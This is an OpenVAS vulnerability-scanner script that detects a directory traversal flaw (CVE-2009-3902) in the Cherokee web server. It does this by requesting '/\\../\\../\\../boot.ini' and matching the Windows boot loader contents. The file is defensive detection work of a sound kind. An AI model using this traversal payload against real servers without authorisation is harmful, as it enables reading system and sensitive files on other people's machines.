###############################################################################
# OpenVAS Vulnerability Test
# $Id: cherokee_36874.nasl 7671 2010-05-12 17:34:03Z mime $
#
# Cherokee Directory Traversal Vulnerability
#
# Authors:
# Michael Meyer
#
# Copyright:
# Copyright (c) 2009 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if (description)
{
 script_id(100326);
 script_tag(name:"cvss_base", value:"5.0");
 script_cve_id("CVE-2009-3902");
 script_bugtraq_id(36874);
 script_version ("1.0-$Revision: 7671 $");
 script_tag(name:"risk_factor", value:"Medium");

 script_name("Cherokee Directory Traversal Vulnerability");

desc = "Overview:
Cherokee is prone to a directory-traversal vulnerability because it
fails to sufficiently sanitize user-supplied input data.

Exploiting the issue may allow an attacker to obtain sensitive
information that could aid in further attacks.

Cherokee 0.5.4 and prior versions are vulnerable.

References:
http://www.securityfocus.com/bid/36874
http://www.alobbs.com/modules.php?op=modload&name=cherokee&file=index
http://freetexthost.com/ncyss3plli

Risk factor : Medium";

 script_description(desc);
 script_summary("Determine if Cherokee Web Server is prone to a directory-traversal vulnerability");
 script_category(ACT_GATHER_INFO);
 script_family("Web Servers");
 script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
 script_dependencies("find_service.nes","http_version.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);
if(!get_port_state(port))exit(0);

banner = get_http_banner(port: port);
if(!banner)exit(0);

if("Cherokee" >< banner && "Win" >< banner) {
       
   url = string("/\\../\\../\\../boot.ini");
   req = http_get(item:url, port:port);
   buf = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
   if( buf == NULL )exit(0);

   if(egrep(pattern:"\[boot loader\]", string: buf)) {
      security_warning(port:port);
      exit(0); 
   }   
}

exit(0);

